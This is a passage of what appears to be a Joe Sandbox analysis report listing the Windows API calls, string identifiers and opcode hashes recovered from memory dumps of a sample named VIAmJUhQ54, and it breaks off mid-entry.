                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: SendString
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 890592661-1007645807
                                                                                • Opcode ID: 4cec808bd381d70081c8042ef9a4d0389f1e6933fca9644048def29167caf497
                                                                                • Instruction ID: dc58e4eddb5bf3fb45971c0edf34a9a3add8cb2a69c3deffbdb7220cf18acaa4
                                                                                • Opcode Fuzzy Hash: 4cec808bd381d70081c8042ef9a4d0389f1e6933fca9644048def29167caf497
                                                                                • Instruction Fuzzy Hash: 7011B2F0640269B9D724A761DC8EDFF7B7CEB91B50F00052A7816A21D1DA680A44C5B1
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 00767794
                                                                                  • Part of subcall function 0073DC38: timeGetTime.WINMM(?,7707B400,007958AB), ref: 0073DC3C
                                                                                • Sleep.KERNEL32(0000000A), ref: 007677C0
                                                                                • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 007677E4
                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00767806
                                                                                • SetActiveWindow.USER32 ref: 00767825
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00767833
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00767852
                                                                                • Sleep.KERNEL32(000000FA), ref: 0076785D
                                                                                • IsWindow.USER32 ref: 00767869
                                                                                • EndDialog.USER32(00000000), ref: 0076787A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                • API String ID: 1194449130-3405671355
                                                                                • Opcode ID: 417d22b61c52c623e8ede386a91a525d972611fd8d2d024be65f2a78d9ee6d75
                                                                                • Instruction ID: dc8d91efbf2f3edfe4a301324c864ca710f24aff0dce889675853893daf60bd5
                                                                                • Opcode Fuzzy Hash: 417d22b61c52c623e8ede386a91a525d972611fd8d2d024be65f2a78d9ee6d75
                                                                                • Instruction Fuzzy Hash: EF216DB0205245AFE7185B20ECCDE263F6AFB8938DF048064F9078B562CB7D8D14DE28
                                                                                APIs
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                • CoInitialize.OLE32(00000000), ref: 0077034B
                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007703DE
                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 007703F2
                                                                                • CoCreateInstance.OLE32(007ADA8C,00000000,00000001,007D3CF8,?), ref: 0077043E
                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007704AD
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00770505
                                                                                • _memset.LIBCMT ref: 00770542
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0077057E
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007705A1
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 007705A8
                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007705DF
                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 007705E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                • String ID:
                                                                                • API String ID: 1246142700-0
                                                                                • Opcode ID: 7714ac7b01a3cfa9d3e23899519d179e2956b797a1a45b64fdca3baaa363989d
                                                                                • Instruction ID: 82b50268930c95fcdfcb45fbf9deb405d8e0eb71de86f7cdfdc4b42dedf418b8
                                                                                • Opcode Fuzzy Hash: 7714ac7b01a3cfa9d3e23899519d179e2956b797a1a45b64fdca3baaa363989d
                                                                                • Instruction Fuzzy Hash: F7B1E975A00118EFDB14DFA4C888DAEBBB9FF89344B148459F90AEB251D738ED45CB50
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00762ED6
                                                                                • SetKeyboardState.USER32(?), ref: 00762F41
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00762F61
                                                                                • GetKeyState.USER32(000000A0), ref: 00762F78
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00762FA7
                                                                                • GetKeyState.USER32(000000A1), ref: 00762FB8
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00762FE4
                                                                                • GetKeyState.USER32(00000011), ref: 00762FF2
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 0076301B
                                                                                • GetKeyState.USER32(00000012), ref: 00763029
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00763052
                                                                                • GetKeyState.USER32(0000005B), ref: 00763060
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 7e27824ac758050152f44acd78a8129467c4d3d8f11409c77716a1a7520f21c2
                                                                                • Instruction ID: 9b66eb32be529e85cf11d51c24779b649f61b2bbe0dd2221da5e6c0858acab90
                                                                                • Opcode Fuzzy Hash: 7e27824ac758050152f44acd78a8129467c4d3d8f11409c77716a1a7520f21c2
                                                                                • Instruction Fuzzy Hash: 1A51F730A04B8869FB75DBA088147EABBF45F12340F08859DD9C3565C3DA5C9B8CC7A2
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000001), ref: 0075ED1E
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0075ED30
                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0075ED8E
                                                                                • GetDlgItem.USER32(?,00000002), ref: 0075ED99
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0075EDAB
                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0075EE01
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0075EE0F
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0075EE20
                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0075EE63
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0075EE71
                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0075EE8E
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0075EE9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                • API String ID: 3096461208-0
                                                                                • Opcode ID: 287f300f4a4399d893ab0398afc75e05d78eb2ff440c5822921cd93f5dd59e1f
                                                                                • Instruction ID: 0b524e3d4f6db09ba55dbe3474e2e584c5f1c822dbf9b54c5022d9ddd2572c7f
                                                                                • Opcode Fuzzy Hash: 287f300f4a4399d893ab0398afc75e05d78eb2ff440c5822921cd93f5dd59e1f
                                                                                • Instruction Fuzzy Hash: 09513371B00205AFDB18CF68DD85AAEBBB6FB89701F14812DF91AD7290D7B49E048B14
                                                                                APIs
                                                                                  • Part of subcall function 0073B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0073B759,?,00000000,?,?,?,?,0073B72B,00000000,?), ref: 0073BA58
                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0073B72B), ref: 0073B7F6
                                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0073B72B,00000000,?,?,0073B2EF,?,?), ref: 0073B88D
                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0079D8A6
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0073B72B,00000000,?,?,0073B2EF,?,?), ref: 0079D8D7
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0073B72B,00000000,?,?,0073B2EF,?,?), ref: 0079D8EE
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0073B72B,00000000,?,?,0073B2EF,?,?), ref: 0079D90A
                                                                                • DeleteObject.GDI32(00000000), ref: 0079D91C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 641708696-0
                                                                                • Opcode ID: 884b2d676176e208ae5b5d5ad2b58da7595cb12e7d516e6b2688a91db5b145f2
                                                                                • Instruction ID: 0d1a39c29278bad3da5ebc41996f5f3f41c035fe5a5cc53a7c9faae018747f24
                                                                                • Opcode Fuzzy Hash: 884b2d676176e208ae5b5d5ad2b58da7595cb12e7d516e6b2688a91db5b145f2
                                                                                • Instruction Fuzzy Hash: 45619F30502640DFEB359F18E989B65B7B5FF99322F54851DE1828AA71CB3CBC80CB84
                                                                                APIs
                                                                                  • Part of subcall function 0073B526: GetWindowLongW.USER32(?,000000EB), ref: 0073B537
                                                                                • GetSysColor.USER32(0000000F), ref: 0073B438
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ColorLongWindow
                                                                                • String ID:
                                                                                • API String ID: 259745315-0
                                                                                • Opcode ID: 6e2390f57bc7073ffa22096e17ab9cba8cc2438ef6ad24ed86b71cc70b147e0f
                                                                                • Instruction ID: 0725a348bc7088712a40d38bcf769eff32f585584e27268a129003c74952077f
                                                                                • Opcode Fuzzy Hash: 6e2390f57bc7073ffa22096e17ab9cba8cc2438ef6ad24ed86b71cc70b147e0f
                                                                                • Instruction Fuzzy Hash: 1141C630100188AFEF345F28DC89BB93766AB46731F148265FE668E5E7D7398C41D729
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                • String ID:
                                                                                • API String ID: 136442275-0
                                                                                • Opcode ID: f447f6385d66644e2e2788d1d65deb12e434669ec561a4984eb76137b52331bf
                                                                                • Instruction ID: e45723b9393942d5b61da6ce769e63cc7e5aa73b172a3452d5463f4254564d33
                                                                                • Opcode Fuzzy Hash: f447f6385d66644e2e2788d1d65deb12e434669ec561a4984eb76137b52331bf
                                                                                • Instruction Fuzzy Hash: 684111B684511CEECF61EB94CC85DDF73BCEB44300F4041A6BA59A2051EB34ABE98F90
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(007BDC00,007BDC00,007BDC00), ref: 0076D7CE
                                                                                • GetDriveTypeW.KERNEL32(?,007D3A70,00000061), ref: 0076D898
                                                                                • _wcscpy.LIBCMT ref: 0076D8C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2820617543-1000479233
                                                                                • Opcode ID: c9f5661e948add438e14d73e6a8cf69816fcde0ec15d336c75cf9c54c326e43a
                                                                                • Instruction ID: e3e3652e1a5f4769eff260e1983052b087510410f182f300a9e1e46b9fd0cc39
                                                                                • Opcode Fuzzy Hash: c9f5661e948add438e14d73e6a8cf69816fcde0ec15d336c75cf9c54c326e43a
                                                                                • Instruction Fuzzy Hash: 61510631614305EFC720EF14D889AAEB7A5FF84314F10882DF99A572A2DB39ED05CB52
                                                                                APIs
                                                                                • __swprintf.LIBCMT ref: 007293AB
                                                                                • __itow.LIBCMT ref: 007293DF
                                                                                  • Part of subcall function 00741557: _xtow@16.LIBCMT ref: 00741578
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf_xtow@16
                                                                                • String ID: %.15g$0x%p$False$True
                                                                                • API String ID: 1502193981-2263619337
                                                                                • Opcode ID: 130269fd81f9663a186d25c008de9c08f273ac49389be7275e93709f813741a1
                                                                                • Instruction ID: 535125bbf1cfeff67454a6e89ae2174694cf3a81e58bafdcd086f7ac69486a70
                                                                                • Opcode Fuzzy Hash: 130269fd81f9663a186d25c008de9c08f273ac49389be7275e93709f813741a1
                                                                                • Instruction Fuzzy Hash: 4F41D871904214EFEB24EF74E945E6AB3F8EF49340F24446EE14AD7182EA39D942CB61
                                                                                APIs
                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0078A259
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0078A260
                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0078A273
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0078A27B
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0078A286
                                                                                • DeleteDC.GDI32(00000000), ref: 0078A28F
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0078A299
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0078A2AD
                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0078A2B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                • String ID: static
                                                                                • API String ID: 2559357485-2160076837
                                                                                • Opcode ID: b4ac359f665e48e98d14333fcced76ba901b75cb73fc8e741ec14f3251307544
                                                                                • Instruction ID: 0c4f2f42fb7cee4e3db879061a4170c6d1485b01cbeb7193e0728eb3443a53dc
                                                                                • Opcode Fuzzy Hash: b4ac359f665e48e98d14333fcced76ba901b75cb73fc8e741ec14f3251307544
                                                                                • Instruction Fuzzy Hash: 31318F31140219BBEF21AFA4DC49FDA3B69FF4E360F114215FA1AA60A0C739DC11DB65
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                • String ID: 0.0.0.0
                                                                                • API String ID: 2620052-3771769585
                                                                                • Opcode ID: 8e03093b49ec507de91392a0c103153933964d0b15f2e3147ae1ee1f2415ae92
                                                                                • Instruction ID: da2248275c5a5bb0a136c002b3410ad255f5e05e90a99ce9ff0578d54c8188f3
                                                                                • Opcode Fuzzy Hash: 8e03093b49ec507de91392a0c103153933964d0b15f2e3147ae1ee1f2415ae92
                                                                                • Instruction Fuzzy Hash: E211E472904214ABDB24AB70AC4EEDA77ACEF45710F404069F507A6081EF7C9E858BA5
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00745047
                                                                                  • Part of subcall function 00747C0E: __getptd_noexit.LIBCMT ref: 00747C0E
                                                                                • __gmtime64_s.LIBCMT ref: 007450E0
                                                                                • __gmtime64_s.LIBCMT ref: 00745116
                                                                                • __gmtime64_s.LIBCMT ref: 00745133
                                                                                • __allrem.LIBCMT ref: 00745189
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007451A5
                                                                                • __allrem.LIBCMT ref: 007451BC
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007451DA
                                                                                • __allrem.LIBCMT ref: 007451F1
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0074520F
                                                                                • __invoke_watson.LIBCMT ref: 00745280
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                • String ID:
                                                                                • API String ID: 384356119-0
                                                                                • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                • Instruction ID: 1e1600085bdd841da1c5c0fb1ac3f3037a1c486f35d57739b6a595df7ec23c1c
                                                                                • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                • Instruction Fuzzy Hash: C471EBB5A00F17EBD7149E78CC45BAA73A8BF01765F14422AF910D7282E7B8ED4487D0
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00764DF8
                                                                                • GetMenuItemInfoW.USER32(007E1708,000000FF,00000000,00000030), ref: 00764E59
                                                                                • SetMenuItemInfoW.USER32(007E1708,00000004,00000000,00000030), ref: 00764E8F
                                                                                • Sleep.KERNEL32(000001F4), ref: 00764EA1
                                                                                • GetMenuItemCount.USER32(?), ref: 00764EE5
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00764F01
                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00764F2B
                                                                                • GetMenuItemID.USER32(?,?), ref: 00764F70
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00764FB6
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00764FCA
                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00764FEB
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                • String ID:
                                                                                • API String ID: 4176008265-0
                                                                                • Opcode ID: 9a4d71d515289c07f14e52c49723ca787ea21ac13a8dd79bfa99056a6750c318
                                                                                • Instruction ID: 5f2a0ebb35c7a3d812d023392b1e21725327227ec76c2904ab910954e498ab9f
                                                                                • Opcode Fuzzy Hash: 9a4d71d515289c07f14e52c49723ca787ea21ac13a8dd79bfa99056a6750c318
                                                                                • Instruction Fuzzy Hash: 33618FB1900289EFDB21CFA4DC88AEE7BB8FB45308F184159F843A7251D739AD55DB21
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00789C98
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00789C9B
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00789CBF
                                                                                • _memset.LIBCMT ref: 00789CD0
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00789CE2
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00789D5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
